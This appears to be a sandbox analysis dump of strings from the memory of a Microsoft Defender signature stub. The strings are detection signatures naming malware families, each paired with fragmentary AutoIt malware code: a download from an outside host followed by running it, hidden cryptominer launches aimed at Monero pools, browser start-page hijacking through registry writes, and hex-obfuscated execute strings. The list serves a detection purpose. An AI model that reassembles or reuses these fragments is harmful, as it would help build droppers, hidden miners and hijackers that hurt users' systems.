Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: := execute ( "dllstructcreate(
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: &while wingetprocess
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: if winclose =
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: & chr ( 92 ) & $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dim $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ] = [ "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0.exe" , "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: `.exe" ]
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:autoit_rc4encodefunc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "performing backup only"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: runwait ( @comspec & " /c "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/racealer.pa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: inetget ( "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ://professorlog.xyz/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: .zip" , "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = objcreate ( "shell.application" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: run ( "c:\users\public\run
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 4dllopen ( "advapi32.dll" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: func _crypt_encryptdata ( $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: p = true )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dobjcreate ( "msxml2.domdocument" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0.datatype = "bin.base64"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return seterror (
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -dwv1.3.au3.509"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $"4054656d70446972"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "313232"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "3937"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 633323339323732393239272929"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ar_3108!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $d3076 = execute
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dim $t31qy644 = $d3076 ( "chr" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:trojan:win32/startpage.zw!bit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:ransom:win32/tron.pb!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $extension = "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: guicreate ( "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _filecreate ( @appdatadir & "\network\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: filecopy ( "c:\programdata\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: " , "c:\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#allowlist:bonzo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_outfile=helpnew.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_res_companyname=bonzo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $sservicename = "tvnserver"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: opt ( "trayiconhide" , 0 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \webhelper.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0-o strat
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ://xmr.2miners.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ://randomxmonero.usa-east.nicehash.com
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ( "6c6c5374727563744765745074722824744275666629290x446c6c5374727563744372656174652822627974655b222026202469506c61696e54657874536
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ( "666292c202264776f7264222c2031290x446c6c43616c6c2824646c6c68616e646c652c2022626f6f6c222c202243727970744861736844617461222c2022
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ( "6c222c204578656375746528225472756522292c202264776f7264222c20302c20227374727563742a222c20
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:lastfolder
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %s%s!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: :longfolder
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojan:script/userexecution.a!amsi
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojan:script/userexecution.a!amsiobmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 48db3ab350cd5
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1d5b3942ec61c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: susptool_
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:colisicomponent
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: appdatafr3.bin
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 15b362aecaba
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: db78cc5e9b0b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %hstr:adware:win32/lollipop_check_arg
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dbb38de769be
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#context:softwarebundler:win32/installmonster.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: (.+)%(.%).exe$
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: (.+).exe$
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 4cb382521bf6
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: &\\.\pipe\local\chrome.nativemessaging
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \\.\pipe\mpvsocket
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \clickonceforgooglechrome.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \evolvecontactagent.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:contextdataprocessname2
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:contextdataprocessname2obmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfilecontextdatapresent
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "lua:openfilecontextdata:procname!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfileforcreatingprocess
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "lua:openfilecontextdata:filename!
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7378b0f18dd3
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:autoitcustomlastsec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#jenxcusbase64deobfuscator
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#jenxcusbase64deobfuscatorobmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e"[a-za-z0-9%+/][a-za-z0-9%+/]=(=?)(..-)[a-za-z0-9%+/][a-za-z0-9%+/]=
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: [jxs64]
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/gatak.eg!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ?\appdata\roaming\microsoft\windows\start menu\programs\startup
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \%d+%.exe$
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: aa785fa688b6
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: cmd /c tas
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 95b39109a48a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:cobmetloader.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lua:cobmetloader.aobmpattributes
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:contextpeadminshare.a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: c:\windows
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lua:contextpeadminshare.a1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 69b3eccf1b7a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: qddddn;222s;222suddddod
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: meu\fddddz9\dddnmnddddsdfgiuddd3{hftdddr{hfdddf\irddddlmgddddfj\fddh
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7tdddnuinddd4qkeddtn:uddd;eifldddddd6l}222iv7ddddjdlpddddzlrjddddlle
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: qdd\kmfvvhddtdddddwdjdzpeddrfeddzi<qjdd\kmfvlqdrledddddjmfhddd[vqdd\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: djodd;22ddddhddddpddttyw
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: djodd;22ddddhddddpddttywx
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#trojan:msil/remloader!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dd"!#trojan:msil/remloader!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: {11111-22222-10009-11112}
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: {11111-22222-50001-00000}
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: filestream
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: filemode
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: fileshare
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: get_discretionaryacl
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rawacl
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: wellknownsidtype
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: aceflags
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: set_useshellexecutex
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alfper:trojan:win32/emaster.a!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\urob
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ros\emaster\log_f
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %s/%s%04u%0
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: u%02u.log
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\uroboro
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \emaster\my_console_
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $id: emaster_crypt.c 583
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 2007-04-13 09:38:10z vlad $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\uroboros
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster\emaster_crypt.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $id: qio_win32.c 549
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 2007-02-26 10:01:38z gilg $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ros\queue\drivers\qio_win32.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $id: qm.c 14872
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 010-12-17 14:02:22z gilg $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d:\work\trunk\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: roboros\queue\qm.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: auto_optimiz
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: event_init
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: auto_opitmize t
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: read_create
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: roboros\emaster\_bin\emaster\win32_debug\emas
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: er.pdb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_sess
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: on_destroy
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: on_create
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_clo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e_socket
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_gro
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: p_clear
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_st
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: rt_group
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_is
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: group_mode
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_ses
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ion_set_path
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_free_
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: md_result
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_del
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ion_exec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ncel_exec
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: emaster_g
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: t_globals
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#app:coinminer32:nicehashminer
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: config file is differs from version of nicehashminer... creating backup archive
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: a re-download of nicehash miner
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: might be needed.
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: unable to get nicehash profitability data. if you are connected to internet, try again later.
